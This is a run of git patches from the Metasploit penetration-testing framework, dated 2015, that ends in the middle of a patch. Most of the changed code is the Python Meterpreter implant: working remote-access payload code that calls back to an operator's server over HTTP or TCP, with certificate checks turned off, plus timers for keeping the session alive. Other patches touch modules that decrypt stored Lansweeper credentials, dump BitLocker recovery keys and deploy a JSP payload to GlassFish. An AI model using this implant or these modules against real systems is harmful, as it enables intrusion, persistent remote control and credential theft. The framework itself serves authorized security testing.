-        * Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.
+
+        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169,
+        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169,
+        Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169, and
+        Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.
       },
       'License'             => MSF_LICENSE,
       'Author'              =>
diff --git a/test/modules/auxiliary/test/report_auth_info.rb b/test/modules/auxiliary/test/report_auth_info.rb
index 9364d6e766..2206aa9b70 100644
--- a/test/modules/auxiliary/test/report_auth_info.rb
+++ b/test/modules/auxiliary/test/report_auth_info.rb
@@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => "report_cred test",
+      'Name'           => "report_cred Test",
       'Description'    => %q{
-      	This module will test every auxiliary module's report_cred method
+        This module will test every auxiliary module's report_cred method
       },
       'Author'         => [ 'sinn3r' ],
       'License'        => MSF_LICENSE
@@ -119,7 +119,7 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def test_asterisk_login
-  	mod = framework.auxiliary.create('voip/asterisk_login')
+    mod = framework.auxiliary.create('voip/asterisk_login')
     mod.report_cred(ip: FAKE_IP, port: FAKE_PORT, user: FAKE_USER, password: FAKE_PASS)
   end
 

From a338920cb3b2595d2d6fbd12ccf4c31dda77a52d Mon Sep 17 00:00:00 2001
From: cldrn <calderon@websec.mx>
Date: Fri, 26 Jun 2015 12:21:35 -0500
Subject: [PATCH 0576/1013] lansweeper_collector retrieves and decrypts
 credentials store in the database of Lansweeper

---
 .../auxiliary/gather/{lansweeper.rb => lansweeper_collector.rb}   | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename modules/auxiliary/gather/{lansweeper.rb => lansweeper_collector.rb} (100%)

diff --git a/modules/auxiliary/gather/lansweeper.rb b/modules/auxiliary/gather/lansweeper_collector.rb
similarity index 100%
rename from modules/auxiliary/gather/lansweeper.rb
rename to modules/auxiliary/gather/lansweeper_collector.rb

From 2968f52ca45b407cd53eb0afc1e244f06b9b8eed Mon Sep 17 00:00:00 2001
From: cldrn <calderon@websec.mx>
Date: Fri, 26 Jun 2015 12:22:34 -0500
Subject: [PATCH 0577/1013] Removes debug sql output

---
 modules/auxiliary/gather/lansweeper_collector.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/gather/lansweeper_collector.rb b/modules/auxiliary/gather/lansweeper_collector.rb
index a0a67a2fc4..f04ee87330 100644
--- a/modules/auxiliary/gather/lansweeper_collector.rb
+++ b/modules/auxiliary/gather/lansweeper_collector.rb
@@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def run
     result = mssql_query('select Credname, Username, Password from ' + datastore['DATABASE'] +
-    '.dbo.tsysCredentials WHERE LEN(Password)>64', true) if mssql_login_datastore
+    '.dbo.tsysCredentials WHERE LEN(Password)>64', false) if mssql_login_datastore
     result[:rows].each do |row|
       print_good("Credential name: #{row[0]} | username: #{row[1]} | password: #{lswdecrypt(row[2])} ")
     end

From c04490e5ebc378d7916fc567d966dae183c81cc3 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Fri, 26 Jun 2015 12:50:37 -0500
Subject: [PATCH 0578/1013] Remove comma before coordinating conjunction

An independent clause does not follow.
---
 modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
index 7e94815287..0ee3145011 100644
--- a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
+++ b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary
     super(update_info(info,
       'Name'        => 'MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure',
       'Description' => %q{
-        This module dumps memory contents using a crafted Range header, and affects only
+        This module dumps memory contents using a crafted Range header and affects only
         Windows 8.1, Server 2012, and Server 2012R2. Note that if the target
         is running in VMware Workstation, this module has a high likelihood
         of resulting in BSOD; however, VMware ESX and non-virtualized hosts

From da779b11016bb04d8caa1dd4667ef46b690de204 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 26 Jun 2015 13:52:44 -0500
Subject: [PATCH 0579/1013] Fix login for 9.1

---
 .../framework/login_scanner/glassfish.rb           | 14 ++------------
 1 file changed, 2 insertions(+), 12 deletions(-)

diff --git a/lib/metasploit/framework/login_scanner/glassfish.rb b/lib/metasploit/framework/login_scanner/glassfish.rb
index e3aa4124da..3b48584f35 100644
--- a/lib/metasploit/framework/login_scanner/glassfish.rb
+++ b/lib/metasploit/framework/login_scanner/glassfish.rb
@@ -145,19 +145,9 @@ module Metasploit
         #   * :proof [String] the HTTP response body
         def try_glassfish_9(credential)
           res = try_login(credential)
-          if res && res.code == 302
-            opts = {
-              'uri'     => '/applications/upload.jsf',
-              'method'  => 'GET',
-              'headers' => {
-                'Cookie'  => "JSESSIONID=#{self.jsession}"
-              }
-            }
 
-            res = send_request(opts)
-            if res && res.code.to_i == 302 && res.headers['Location'].to_s !~ /loginError\.jsf$/
-              return {:status => Metasploit::Model::Login::Status::SUCCESSFUL, :proof => res.body}
-            end
+          if res && res.code.to_i == 302 && res.headers['Location'].to_s !~ /loginError\.jsf$/
+            return {:status => Metasploit::Model::Login::Status::SUCCESSFUL, :proof => res.body}
           end
 
           {:status => Metasploit::Model::Login::Status::INCORRECT, :proof => res.body}

From 79185e91c6a9ab919d594d797a76f6ef51b42971 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Fri, 26 Jun 2015 14:56:31 -0400
Subject: [PATCH 0580/1013] Refactor the pymet to use transport objects

---
 data/meterpreter/ext_server_stdapi.py |   1 +
 data/meterpreter/meterpreter.py       | 225 +++++++++++++++-----------
 lib/msf/core/handler/reverse_http.rb  |   7 +-
 3 files changed, 137 insertions(+), 96 deletions(-)

diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py
index 9e487280be..cdb2a5d199 100644
--- a/data/meterpreter/ext_server_stdapi.py
+++ b/data/meterpreter/ext_server_stdapi.py
@@ -1,3 +1,4 @@
+# vim: tabstop=4 softtabstop=4 shiftwidth=4 noexpandtab
 import fnmatch
 import getpass
 import os
diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index bc0aa3d648..df05efb0bc 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -1,4 +1,5 @@
 #!/usr/bin/python
+# vim: tabstop=4 softtabstop=4 shiftwidth=4 noexpandtab
 import code
 import os
 import platform
@@ -60,14 +61,16 @@ else:
 # Constants
 #
 
-# these values may be patched, DO NOT CHANGE THEM
+# these values will be patched, DO NOT CHANGE THEM
 DEBUGGING = False
-HTTP_COMMUNICATION_TIMEOUT = 300
 HTTP_CONNECTION_URL = None
-HTTP_EXPIRATION_TIMEOUT = 604800
 HTTP_PROXY = None
 HTTP_USER_AGENT = None
 PAYLOAD_UUID = ""
+SESSION_COMMUNICATION_TIMEOUT = 300
+SESSION_EXPIRATION_TIMEOUT = 604800
+SESSION_RETRY_TOTAL = 3600
+SESSION_RETRY_WAIT = 10
 
 PACKET_TYPE_REQUEST        = 0
 PACKET_TYPE_RESPONSE       = 1
@@ -393,52 +396,117 @@ class STDProcess(subprocess.Popen):
 				self.stdout_reader.read(len(channel_data))
 export(STDProcess)
 
-class PythonMeterpreter(object):
-	def __init__(self, socket=None):
+class Transport(object):
+	def __init__(self):
+		self.communication_timeout = SESSION_COMMUNICATION_TIMEOUT
+		self.communication_last = 0
+		self.communication_active = True
+		self.retry_total = SESSION_RETRY_TOTAL
+		self.retry_wait = SESSION_RETRY_WAIT
+
+	def get_packet(self):
+		self.communication_active = False
+		try:
+			pkt = self._get_packet()
+		except:
+			return None
+		self.communication_active = True
+		self.communication_last = time.time()
+		return pkt
+
+	def send_packet(self, pkt):
+		self.communication_active = False
+		try:
+			self._send_packet(pkt)
+		except:
+			return None
+		self.communication_active = True
+		self.communication_last = time.time()
+
+	def tlv_pack_timeouts(self):
+		response  = tlv_pack(TLV_TYPE_TRANS_COMM_TIMEOUT, self.communication_timeout)
+		response += tlv_pack(TLV_TYPE_TRANS_RETRY_TOTAL, self.retry_total)
+		response += tlv_pack(TLV_TYPE_TRANS_RETRY_WAIT, self.retry_wait)
+		return response
+
+class HttpTransport(Transport):
+	def __init__(self, url, proxy=None, user_agent=None):
+		super(HttpTransport, self).__init__()
+		opener_args = []
+		scheme = url.split(':', 1)[0]
+		if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2,7,9)) or sys.version_info >= (3,4,3)):
+			import ssl
+			ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
+			ssl_ctx.check_hostname = False
+			ssl_ctx.verify_mode = ssl.CERT_NONE
+			opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
+		if proxy:
+			opener_args.append(urllib.ProxyHandler({scheme: proxy}))
+		opener = urllib.build_opener(*opener_args)
+		if user_agent:
+			opener.addheaders = [('User-Agent', user_agent)]
+		urllib.install_opener(opener)
+		self.url = url
+		self._http_last_seen = time.time()
+		self._http_request_headers = {'Content-Type': 'application/octet-stream'}
+
+	def _get_packet(self):
+		packet = None
+		request = urllib.Request(self.url, bytes('RECV', 'UTF-8'), self._http_request_headers)
+		url_h = urllib.urlopen(request)
+		packet = url_h.read()
+		if packet:
+			packet = packet[8:]
+		else:
+			packet = None
+		return packet
+
+	def _send_packet(self, packet):
+		request = urllib.Request(self.url, packet, self._http_request_headers)
+		url_h = urllib.urlopen(request)
+		response = url_h.read()
+
+class TcpTransport(Transport):
+	def __init__(self, socket):
+		super(TcpTransport, self).__init__()
 		self.socket = socket
-		self.driver = None
+
+	def _get_packet(self):
+		packet = None
+		if len(select.select([self.socket], [], [], 0.5)[0]):
+			packet = self.socket.recv(8)
+			if len(packet) != 8:
+				return None
+			pkt_length, pkt_type = struct.unpack('>II', packet)
+			pkt_length -= 8
+			packet = bytes()
+			while len(packet) < pkt_length:
+				packet += self.socket.recv(pkt_length - len(packet))
+		return packet
+
+	def _send_packet(self, packet):
+		self.socket.send(packet)
+
+class PythonMeterpreter(object):
+	def __init__(self, transport):
+		self.transport = transport
 		self.running = False
-		self.communications_active = True
-		self.communications_last = 0
-		if self.socket:
-			self.driver = 'tcp'
-		elif HTTP_CONNECTION_URL:
-			self.driver = 'http'
 		self.last_registered_extension = None
 		self.extension_functions = {}
 		self.channels = {}
 		self.interact_channels = []
 		self.processes = {}
-		self.transports = []
+		self.transports = [self.transport]
+		self.session_expiry_time = SESSION_EXPIRATION_TIMEOUT
+		self.session_expiry_end = time.time() + self.session_expiry_time
 		for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
 			self.extension_functions[func[1:]] = getattr(self, func)
-		if self.driver:
-			if hasattr(self, 'driver_init_' + self.driver):
-				getattr(self, 'driver_init_' + self.driver)()
-			self.running = True
+		self.running = True
 
 	def debug_print(self, msg):
 		if DEBUGGING:
 			print(msg)
 
-	def driver_init_http(self):
-		opener_args = []
-		scheme = HTTP_CONNECTION_URL.split(':', 1)[0]
-		if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2,7,9)) or sys.version_info >= (3,4,3)):
-			import ssl
-			ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
-			ssl_ctx.check_hostname=False
-			ssl_ctx.verify_mode=ssl.CERT_NONE
-			opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
-		if HTTP_PROXY:
-			opener_args.append(urllib.ProxyHandler({scheme: HTTP_PROXY}))
-		opener = urllib.build_opener(*opener_args)
-		if HTTP_USER_AGENT:
-			opener.addheaders = [('User-Agent', HTTP_USER_AGENT)]
-		urllib.install_opener(opener)
-		self._http_last_seen = time.time()
-		self._http_request_headers = {'Content-Type': 'application/octet-stream'}
-
 	def register_extension(self, extension_name):
 		self.last_registered_extension = extension_name
 		return self.last_registered_extension
@@ -468,67 +536,19 @@ class PythonMeterpreter(object):
 		return idx
 
 	def get_packet(self):
-		packet = getattr(self, 'get_packet_' + self.driver)()
-		self.communications_last = time.time()
-		if packet:
-			self.communications_active = True
-		return packet
+		return self.transport.get_packet()
 
 	def send_packet(self, packet):
-		getattr(self, 'send_packet_' + self.driver)(packet)
-		self.communications_last = time.time()
-		self.communications_active = True
+		self.transport.send_packet(packet)
 
-	def get_packet_http(self):
-		packet = None
-		request = urllib.Request(HTTP_CONNECTION_URL, bytes('RECV', 'UTF-8'), self._http_request_headers)
-		try:
-			url_h = urllib.urlopen(request)
-			packet = url_h.read()
-		except:
-			if (time.time() - self._http_last_seen) > HTTP_COMMUNICATION_TIMEOUT:
-				self.running = False
-		else:
-			self._http_last_seen = time.time()
-		if packet:
-			packet = packet[8:]
-		else:
-			packet = None
-		return packet
-
-	def send_packet_http(self, packet):
-		request = urllib.Request(HTTP_CONNECTION_URL, packet, self._http_request_headers)
-		try:
-			url_h = urllib.urlopen(request)
-			response = url_h.read()
-		except:
-			if (time.time() - self._http_last_seen) > HTTP_COMMUNICATION_TIMEOUT:
-				self.running = False
-		else:
-			self._http_last_seen = time.time()
-
-	def get_packet_tcp(self):
-		packet = None
-		if len(select.select([self.socket], [], [], 0.5)[0]):
-			packet = self.socket.recv(8)
-			if len(packet) != 8:
-				self.running = False
-				return None
-			pkt_length, pkt_type = struct.unpack('>II', packet)
-			pkt_length -= 8
-			packet = bytes()
-			while len(packet) < pkt_length:
-				packet += self.socket.recv(pkt_length - len(packet))
-		return packet
-
-	def send_packet_tcp(self, packet):
-		self.socket.send(packet)
+	@property
+	def session_has_expired(self):
+		return time.time() > self.session_expiry_end
 
 	def run(self):
-		while self.running:
+		while self.running and not self.session_has_expired:
 			request = None
-			should_get_packet = self.communications_active or ((time.time() - self.communications_last) > 0.5)
-			self.communications_active = False
+			should_get_packet = self.transport.communication_active or ((time.time() - self.transport.communication_last) > 0.5)
 			if should_get_packet:
 				request = self.get_packet()
 			if request:
@@ -673,7 +693,22 @@ class PythonMeterpreter(object):
 		raise NotImplemented()
 
 	def _core_transport_set_timeouts(self, request, response):
-		raise NotImplemented()
+		timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value')
+		if timeout_value:
+			self.session_expiry_time = timeout_value
+			self.session_expiry_end = time.time() + self.session_expiry_time
+		timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value')
+		if timeout_value:
+			self.transport.communication_timeout = timeout_value
+		retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value')
+		if retry_value:
+			self.transport.retry_total = retry_value
+		retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value')
+		if retry_value:
+			self.transport.retry_wait = retry_value
+
+		response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
+		response += self.transport.tlv_pack_timeouts()
 
 	def _core_transport_sleep(self, request, response):
 		raise NotImplemented()
@@ -804,14 +839,16 @@ class PythonMeterpreter(object):
 		resp = struct.pack('>I', len(resp) + 4) + resp
 		return resp
 
-if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
+#if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
+if True:
 	if hasattr(os, 'setsid'):
 		try:
 			os.setsid()
 		except OSError:
 			pass
 	if HTTP_CONNECTION_URL and has_urllib:
-		met = PythonMeterpreter()
+		transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT)
 	else:
-		met = PythonMeterpreter(s)
+		transport = TcpTransport(s)
+	met = PythonMeterpreter(transport)
 	met.run()
diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index f2e0073f6a..1874991f62 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -285,8 +285,6 @@ protected
 
         # Patch all the things
         blob.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(url)}'")
-        blob.sub!('HTTP_EXPIRATION_TIMEOUT = 604800', "HTTP_EXPIRATION_TIMEOUT = #{datastore['SessionExpirationTimeout']}")
-        blob.sub!('HTTP_COMMUNICATION_TIMEOUT = 300', "HTTP_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
         blob.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(datastore['MeterpreterUserAgent'])}'")
 
         unless datastore['PayloadProxyHost'].blank?
@@ -294,6 +292,11 @@ protected
           blob.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'")
         end
 
+        blob.sub!('SESSION_EXPIRATION_TIMEOUT = 604800', "SESSION_EXPIRATION_TIMEOUT = #{datastore['SessionExpirationTimeout']}")
+        blob.sub!('SESSION_COMMUNICATION_TIMEOUT = 300', "SESSION_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
+        blob.sub!('SESSION_RETRY_TOTAL = 3600', "SESSION_RETRY_TOTAL = #{datastore['SessionRetryTotal']}")
+        blob.sub!('SESSION_RETRY_WAIT = 10', "SESSION_RETRY_WAIT = #{datastore['SessionRetryWait']}")
+
         resp.body = blob
 
         # Short-circuit the payload's handle_connection processing for create_session

From 3b5e2a0c6e176e6881d5f795cbe06b0ca041f2fd Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 26 Jun 2015 14:02:17 -0500
Subject: [PATCH 0581/1013] Use TARGETURI

---
 modules/exploits/multi/http/glassfish_deployer.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb
index ee6537e866..43782be301 100644
--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
           OptString.new('APP_RPORT',[ true,  'The Application interface port', '8080']),
           OptString.new('USERNAME', [ false, 'The username to authenticate as','admin' ]),
           OptString.new('PASSWORD', [ false, 'The password for the specified username','' ]),
-          OptString.new('PATH', [ true,  "The URI path of the GlassFish Server", '/']),
+          OptString.new('TARGETURI', [ true,  "The URI path of the GlassFish Server", '/']),
           OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false])
         ], self.class)
   end
@@ -595,7 +595,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     #Execute our payload using the application interface (no need to use auth bypass technique)
-    jsp_path = "/" + app_base + "/" + jsp_name + ".jsp"
+    jsp_path = normalize_uri(target_uri.path, app_base, "#{jsp_name}.jsp")
     nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['APP_RPORT'],
       {
         'Msf'        => framework,
@@ -682,7 +682,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def my_target_host
-    my_target_host = "http://#{rhost.to_s}:#{rport.to_s}#{normalize_uri(datastore['PATH'])}"
+    my_target_host = "http://#{rhost.to_s}:#{rport.to_s}#{normalize_uri(target_uri.path)}"
   end
 
 
@@ -740,7 +740,7 @@ class Metasploit3 < Msf::Exploit::Remote
       private_type: :password
     ))
 
-    @scanner.send_request({'uri'=>'/'})
+    @scanner.send_request({'uri'=>normalize_uri(target_uri.path)})
     @scanner.version = version
     @cred_collection.each do |raw|
       cred = raw.to_credential

From 175d9cdcb13412b28d18ada22d8eee77531e2d8b Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Fri, 26 Jun 2015 16:52:55 -0400
Subject: [PATCH 0582/1013] Pymet support for creating and listing transports

---
 data/meterpreter/meterpreter.py | 80 ++++++++++++++++++++++++++++++---
 1 file changed, 75 insertions(+), 5 deletions(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index df05efb0bc..c24cdf211e 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -404,6 +404,20 @@ class Transport(object):
 		self.retry_total = SESSION_RETRY_TOTAL
 		self.retry_wait = SESSION_RETRY_WAIT
 
+	@staticmethod
+	def from_request(request):
+		url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
+		if url.startswith('tcp'):
+			transport = TcpTransport(url)
+		elif url.startswith('http'):
+			proxy = packet_get_tlv(request, TLV_TYPE_TRANS_PROXY_HOST).get('value')
+			user_agent = packet_get_tlv(request, TLV_TYPE_TRANS_UA).get('value', HTTP_USER_AGENT)
+			transport = HttpTransport(url, proxy=proxy, user_agent=user_agent)
+		transport.communication_timeout = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value', SESSION_COMMUNICATION_TIMEOUT)
+		transport.retry_total = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value', SESSION_RETRY_TOTAL)
+		transport.retry_wait = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value', SESSION_RETRY_WAIT)
+		return transport
+
 	def get_packet(self):
 		self.communication_active = False
 		try:
@@ -429,6 +443,11 @@ class Transport(object):
 		response += tlv_pack(TLV_TYPE_TRANS_RETRY_WAIT, self.retry_wait)
 		return response
 
+	def tlv_pack_transport_group(self):
+		trans_group  = tlv_pack(TLV_TYPE_TRANS_URL, self.url)
+		trans_group += self.tlv_pack_timeouts()
+		return trans_group
+
 class HttpTransport(Transport):
 	def __init__(self, url, proxy=None, user_agent=None):
 		super(HttpTransport, self).__init__()
@@ -442,12 +461,13 @@ class HttpTransport(Transport):
 			opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
 		if proxy:
 			opener_args.append(urllib.ProxyHandler({scheme: proxy}))
+		self.proxy = proxy
 		opener = urllib.build_opener(*opener_args)
 		if user_agent:
 			opener.addheaders = [('User-Agent', user_agent)]
+		self.user_agent = user_agent
 		urllib.install_opener(opener)
 		self.url = url
-		self._http_last_seen = time.time()
 		self._http_request_headers = {'Content-Type': 'application/octet-stream'}
 
 	def _get_packet(self):
@@ -466,12 +486,42 @@ class HttpTransport(Transport):
 		url_h = urllib.urlopen(request)
 		response = url_h.read()
 
+	def tlv_pack_transport_group(self):
+		trans_group  = super(HttpTransport, self).tlv_pack_transport_group()
+		if self.user_agent:
+			trans_group += tlv_pack(TLV_TYPE_TRANS_UA, self.user_agent)
+		if self.proxy:
+			trans_group += tlv_pack(TLV_TYPE_TRANS_PROXY_HOST, self.proxy)
+		return trans_group
+
 class TcpTransport(Transport):
-	def __init__(self, socket):
+	def __init__(self, url, socket=None):
 		super(TcpTransport, self).__init__()
+		self.url = url
 		self.socket = socket
 
+	def _check_socket(self):
+		if self.socket:
+			return
+		if self.url.startswith('tcp:'):
+			family = socket.AF_INET
+			address, port = url[6:].split(':', 1)
+		else:
+			family = socket.AF_INET6
+			address, port = url[7:].split(':', 1)
+		port = int(port.rstrip('/'))
+		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		if address == '0.0.0.0' or address == '::':
+			sock.bind((address, port))
+			sock.listen(1)
+			sock, _ = sock.accept()
+		else:
+			sock.connect((address, port))
+		self.socket = sock
+		return
+
 	def _get_packet(self):
+		self._check_socket()
 		packet = None
 		if len(select.select([self.socket], [], [], 0.5)[0]):
 			packet = self.socket.recv(8)
@@ -485,8 +535,23 @@ class TcpTransport(Transport):
 		return packet
 
 	def _send_packet(self, packet):
+		self._check_socket()
 		self.socket.send(packet)
 
+	@classmethod
+	def from_socket(cls, sock):
+		if sock.family == socket.AF_INET:
+			url = 'tcp://'
+		else:
+			url = 'tcp6://'
+		address, port = sock.getsockname()[:2]
+		# this will need to be changed if the bind stager ever supports binding to a specific address
+		if not (address == '0.0.0.0' or address == '::'):
+			address, port = sock.getpeername()[:2]
+		url += address + ':' + str(port)
+		url = url
+		return cls(url, sock)
+
 class PythonMeterpreter(object):
 	def __init__(self, transport):
 		self.transport = transport
@@ -678,13 +743,17 @@ class PythonMeterpreter(object):
 		return ERROR_SUCCESS, response
 
 	def _core_transport_add(self, request, response):
-		raise NotImplemented()
+		self.transports.append(Transport.from_request(request))
+		return ERROR_SUCCESS, response
 
 	def _core_transport_change(self, request, response):
 		raise NotImplemented()
 
 	def _core_transport_list(self, request, response):
-		raise NotImplemented()
+		response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
+		for transport in self.transports:
+			response += tlv_pack(TLV_TYPE_TRANS_GROUP, transport.tlv_pack_transport_group())
+		return ERROR_SUCCESS, response
 
 	def _core_transport_next(self, request, response):
 		raise NotImplemented()
@@ -709,6 +778,7 @@ class PythonMeterpreter(object):
 
 		response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
 		response += self.transport.tlv_pack_timeouts()
+		return ERROR_SUCCESS, response
 
 	def _core_transport_sleep(self, request, response):
 		raise NotImplemented()
@@ -849,6 +919,6 @@ if True:
 	if HTTP_CONNECTION_URL and has_urllib:
 		transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT)
 	else:
-		transport = TcpTransport(s)
+		transport = TcpTransport.from_socket(s)
 	met = PythonMeterpreter(transport)
 	met.run()

From 600a2962915e862b2fcc675ac4bf050f6921b30a Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 26 Jun 2015 16:51:00 -0500
Subject: [PATCH 0583/1013] Do minor cleanup

---
 .../post/windows/gather/enum_ad_bitlocker.rb  | 23 ++++++++++---------
 1 file changed, 12 insertions(+), 11 deletions(-)

diff --git a/modules/post/windows/gather/enum_ad_bitlocker.rb b/modules/post/windows/gather/enum_ad_bitlocker.rb
index b251c602d4..b2aa320180 100644
--- a/modules/post/windows/gather/enum_ad_bitlocker.rb
+++ b/modules/post/windows/gather/enum_ad_bitlocker.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http//metasploit.com/download
+# This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
@@ -14,18 +14,18 @@ class Metasploit3 < Msf::Post
   def initialize(info = {})
     super(update_info(info,
       'Name'         => 'Windows Gather Active Directory BitLocker Recovery',
-      'Description'  => %(
-          This module will enumerate BitLocker recovery passwords in the default AD
-          directory. Requires Domain Admin or other delegated privileges.
-      ),
+      'Description'  => %q{
+        This module will enumerate BitLocker recovery passwords in the default AD
+        directory. Requires Domain Admin or other delegated privileges.
+      },
       'License'      => MSF_LICENSE,
-      'Author'       => [ 'Ben Campbell <ben.campbell[at]mwrinfosecurity.com>' ],
-      'Platform'     => [ 'win' ],
-      'SessionTypes' => [ 'meterpreter' ],
+      'Author'       => ['Ben Campbell <ben.campbell[at]mwrinfosecurity.com>'],
+      'Platform'     => ['win'],
+      'SessionTypes' => ['meterpreter'],
       'References'   =>
-      [
-        ['URL', 'https://technet.microsoft.com/en-us/library/cc771778%28v=ws.10%29.aspx']
-      ]
+        [
+          ['URL', 'https://technet.microsoft.com/en-us/library/cc771778%28v=ws.10%29.aspx']
+        ]
     ))
 
     register_options([
@@ -66,6 +66,7 @@ class Metasploit3 < Msf::Post
     end
 
     print_line results_table.to_s
+
     if datastore['STORE_LOOT']
       stored_path = store_loot('bitlocker.recovery', 'text/plain', session, results_table.to_csv)
       print_status("Results saved to: #{stored_path}")

From b4656f43a46c417a676cadfcba1135931acd3969 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 26 Jun 2015 18:04:18 -0500
Subject: [PATCH 0584/1013] Fix #5616, Save username before stop_on_success
 breaks the task

Fix #5616
---
 lib/metasploit/framework/login_scanner/base.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/metasploit/framework/login_scanner/base.rb b/lib/metasploit/framework/login_scanner/base.rb
index 889002eb36..352065916b 100644
--- a/lib/metasploit/framework/login_scanner/base.rb
+++ b/lib/metasploit/framework/login_scanner/base.rb
@@ -220,8 +220,8 @@ module Metasploit
 
               if result.success?
                 consecutive_error_count = 0
-                break if stop_on_success
                 successful_users << credential.public
+                break if stop_on_success
               else
                 if result.status == Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
                   consecutive_error_count += 1

From 007da4af41cadf97ca59fc9542c0779e4c6fe2f5 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Sat, 27 Jun 2015 18:21:15 +1000
Subject: [PATCH 0585/1013] Force :init_connect for stageless

---
 lib/msf/core/payload/transport_config.rb                       | 3 ++-
 modules/payloads/singles/windows/meterpreter_reverse_http.rb   | 1 +
 modules/payloads/singles/windows/meterpreter_reverse_https.rb  | 1 +
 .../payloads/singles/windows/x64/meterpreter_reverse_http.rb   | 1 +
 .../payloads/singles/windows/x64/meterpreter_reverse_https.rb  | 1 +
 5 files changed, 6 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb
index f75c5c3db2..c0647a26ea 100644
